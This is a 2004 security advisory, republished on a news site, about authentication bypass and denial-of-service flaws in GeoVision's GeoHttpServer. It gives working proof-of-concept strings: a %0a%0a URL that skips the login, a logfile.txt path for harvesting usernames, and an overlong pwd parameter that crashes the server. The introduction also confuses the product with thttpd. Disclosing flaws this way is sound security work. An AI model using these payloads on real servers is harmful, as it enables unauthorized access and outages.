Risks
Vulnerabilities
Browse by
GeoHttpServer Authentification Bypass Vulnerability & Denial Of Service Vulnerability
23 January 2004
Bookmark and Share
From: "Rafel Ivgi, The-Insider" <theinsider(at)012.net.il>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Software: GeoHttpServer
Vendor: GEOVISION INC
http://www.geovision.com.tw
Versions: ALL
Platforms: Unix
Bug: Authentification Bypass Vulnerability & D.O.S (DenialOf Service)
Risk: High
Exploitation: Remote with browser
Date: 22 Jan 2004
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@mail.com
web: http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bug
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

thttpd is a free "Open Source" webserver that comes by default with unixsystems such as FREEBSD and Linux.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

The GeoHttpServer Security is pretty good. Some users, who understand whatthey are doing configure the server to authentificate login attempts.

The server uses this authentification code:
**********************************************
<html><head><title>Login In</title>
</head><body><center>
<form method="POST" action="phoneinfo">User Name:</BR>
<input type="id" name="id" size="10"><p></p>
Password:</BR>
<input type="password" name="pwd" size="10">
<p><input type="radio" name="ImageType" value="1" checked>JPEG&nbsp;
<input type="radio" name="ImageType" value="2">GIF</p>
<p><input type="submit" name="send" value="Submit"><input type="reset"
name="CANCEL" value="Cancel"></center><center>

</p>
</form>
</center>
</body>
</html>
**********************************************

Amazingly - http://<host>/%0a%0a Bypasses it!
You get the GeoHttpServer default Main Page.
Now the main page leads to functions that also require authentifiaction,In order to retrieve a user name we can go to http://<host>/logfile.txtWhich generally contains the last logins and usernames.
In most cases the password will be the same as the user.
In addition there is an authentification form inside the server thatrequires a name anda password in order to see the server info/config.
Manipulating this links can cause Denial Of service of the server.

P.O.C(Proof Of Concept):
http://<GeoHttpServerhost>/sysinfo?id=TheInsider&pwd=killedaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Another D.O.S caused by the server is an Internet Explorer D.O.S whensomeone is watchingvideo stream from the server and presses the reconnect button, I.E has anoverflow.
Internet Explorer Version: 6.0.2600.0
Module Stuck: msxml3.dll
Module Version: 8.20.9415.0
Offset: 00013ed6

http://theinsider.deep-ice.com/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

Authentification Bypass - http://<host>/%0a%0a Bypasses it!Denial Of Service -
http://<GeoHttpServerhost>/sysinfo?id=TheInsider&pwd=killedaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com


Spotlight

eBook: Cybersecurity for Dummies

Posted on 16 December 2014.  |  APTs have changed the world of enterprise security and how networks and organizations are attacked. These threats, and the cybercriminals behind them, are experts at remaining hidden from traditional security while exhibiting an intelligence, resiliency, and patience that has never been seen before.


Weekly newsletter

Reading our newsletter every Monday will keep you up-to-date with security news.
  



Daily digest

Receive a daily digest of the latest security news.
  
DON'T
MISS

Fri, Dec 19th
    COPYRIGHT 1998-2014 BY HELP NET SECURITY.   // READ OUR PRIVACY POLICY // ABOUT US // ADVERTISE //